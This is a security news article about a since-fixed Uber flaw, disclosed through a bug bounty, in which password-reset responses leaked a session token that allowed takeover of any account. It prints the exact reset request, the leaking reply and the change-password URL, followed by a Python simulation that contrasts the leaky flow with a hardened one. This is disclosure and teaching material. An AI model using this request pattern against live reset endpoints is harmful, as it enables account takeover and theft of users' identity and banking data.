神刀安全网

An Italian expert discovered a critical Improper Authentication vulnerability affecting the…

The Italian security expert Vincenzo C., aka @Procode701, discovered seven months ago a critical vulnerability in the Uber platform that allowed a password reset for any Uber account.

The researcher reported the "Improper Authentication" vulnerability through the company's bug bounty program, which runs on HackerOne.

"With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account." reads the summary published by Uber.

“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”

The flaw lies in the password reset process: a password reset request returned a session token, "inAuthSessionID", that could then be used to change the password of any account.

I contacted the expert for further details, and he told me that just by sending a password reset request with the valid email address of any Uber account, the reply included the session token "inAuthSessionID". The Uber platform generated a new session token every time a user requested a password reset email.


Once the session token "inAuthSessionID" was obtained, it was possible to change the password using the standard link present in the change password form.


  1. The change-password link, with the session ID pasted in:

     https://auth.uber.com/login/stage/<inAuthSessionID>/af9b9d0c-bb98-41de-876c-4cb911c79bd1

     <inAuthSessionID> is the session ID generated by the change password request below; the trailing segment, af9b9d0c-bb98-41de-876c-4cb911c79bd1, is a token ID with no expiration date.

  2. The password reset request:

     POST /login/handleanswer HTTP/1.1
     Host: auth.uber.com

     {
       "init": false,
       "answer": {
         "type": "PASSWORD_RESET_WITH_EMAIL",
         "userIdentifier": {
           "email": "xxxx@uber.com"
         }
       }
     }

  3. The reply, which exposes the session token to whoever sent the request:

     HTTP/1.1 200 OK

     {
       "inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28",
       "stage": {
         "question": {
           "signinToken": "",
           "type": "VERIFY_PASSWORD_RESET",
           "tripChallenges": []
         },
         "alternatives": []
       }
     }
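The exchange above, reduced to a runnable model, as an added example that is not Uber's code and not the researcher's: the leaky variant echoes the reset token in the HTTP response exactly as the reply does, the hardened variant keeps the token in the e-mail channel and also makes it time-limited and single-use (the page notes the original token ID had no expiration date). ResetService, Mailbox, request_reset, complete_reset, FakeClock and the in-memory stores are names and structures assumed for the example; the victim account and clock values are constructed test data.

```python
"""Password-reset flow: the token-echoing pattern beside a hardened one.

Added illustration, not Uber's code. ResetService, Mailbox, request_reset,
complete_reset and the in-memory stores are assumptions made for this example;
the account and the clock are constructed test data.
"""
import json
import secrets
import time


class Mailbox:
    """Stand-in for the e-mail channel: only the legitimate user can read it."""

    def __init__(self):
        self.sent = {}  # email -> reset tokens delivered to that address

    def send(self, email, token):
        self.sent.setdefault(email, []).append(token)


class ResetService:
    """Minimal password-reset backend.

    leak_token=True reproduces the bug on the page (token echoed in the HTTP
    response); False keeps it in the e-mail channel only. Tokens are also
    time-limited and single-use, which the page notes the original lacked.
    """

    TOKEN_TTL = 15 * 60  # seconds

    def __init__(self, leak_token, clock=time.time):
        self.leak_token = leak_token
        self.clock = clock
        self.accounts = {}  # email -> password
        self.pending = {}   # token -> (email, expiry timestamp)
        self.mailbox = Mailbox()

    def register(self, email, password):
        self.accounts[email] = password

    def request_reset(self, email):
        """PASSWORD_RESET_WITH_EMAIL step; returns the JSON-able response body."""
        # Same body whether or not the account exists, so the endpoint cannot
        # be used to enumerate registered addresses.
        response = {"stage": {"question": {"type": "VERIFY_PASSWORD_RESET"}}}
        if email in self.accounts:
            token = secrets.token_urlsafe(32)
            self.pending[token] = (email, self.clock() + self.TOKEN_TTL)
            self.mailbox.send(email, token)
            if self.leak_token:
                response["inAuthSessionID"] = token  # the vulnerable line
        return response

    def complete_reset(self, token, new_password):
        """Consume the token and set the new password; False on any failure."""
        entry = self.pending.pop(token, None)  # single use, even on failure
        if entry is None:
            return False
        email, expiry = entry
        if self.clock() > expiry:
            return False
        self.accounts[email] = new_password
        return True


class FakeClock:
    """Controllable clock so token expiry can be exercised offline."""

    def __init__(self, start=1_700_000_000.0):
        self.now = start

    def __call__(self):
        return self.now


def make_service(leak_token):
    svc = ResetService(leak_token, FakeClock())
    svc.register("victim@example.com", "original-password")  # constructed account
    return svc


def attacker_takeover(service, victim_email):
    """Attacker knows only the e-mail and sees HTTP responses, never the mailbox."""
    resp = service.request_reset(victim_email)
    token = resp.get("inAuthSessionID")
    if token is None:
        return False
    return service.complete_reset(token, "attacker-chosen")


def response_echoes_emailed_token(service, email):
    """Pentest-style check: does a token sent by e-mail also appear in the response?"""
    body = json.dumps(service.request_reset(email))
    return any(tok in body for tok in service.mailbox.sent.get(email, []))


def legitimate_reset(service, email, new_password, delay=0):
    """User path: take the token from the mailbox, optionally `delay` seconds later."""
    service.request_reset(email)
    token = service.mailbox.sent[email][-1]
    service.clock.now += delay
    return service.complete_reset(token, new_password)


if __name__ == "__main__":
    victim = "victim@example.com"
    print("leaky flow, attacker wins:", attacker_takeover(make_service(True), victim))
    print("hardened flow, attacker wins:", attacker_takeover(make_service(False), victim))
    print("hardened flow, stale token accepted:",
          legitimate_reset(make_service(False), victim, "new", delay=3600))
```

The response_echoes_emailed_token check is the test a pentester wants against any reset endpoint: whatever secret the server delivers out of band must never appear in the in-band response, regardless of field name.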

The impact of the vulnerability is severe: it allowed an attacker to take over any account and access the user's data, including identity documents (ID card, driver's license) and banking data.

Below the timeline of the vulnerability:

October 2, 2016 – Bug reported to the company

October 4, 2016 – Flaw Triaged

October 6, 2016 – Flaw Resolved

October 18, 2016 – Researcher rewarded with $10,000 USD.
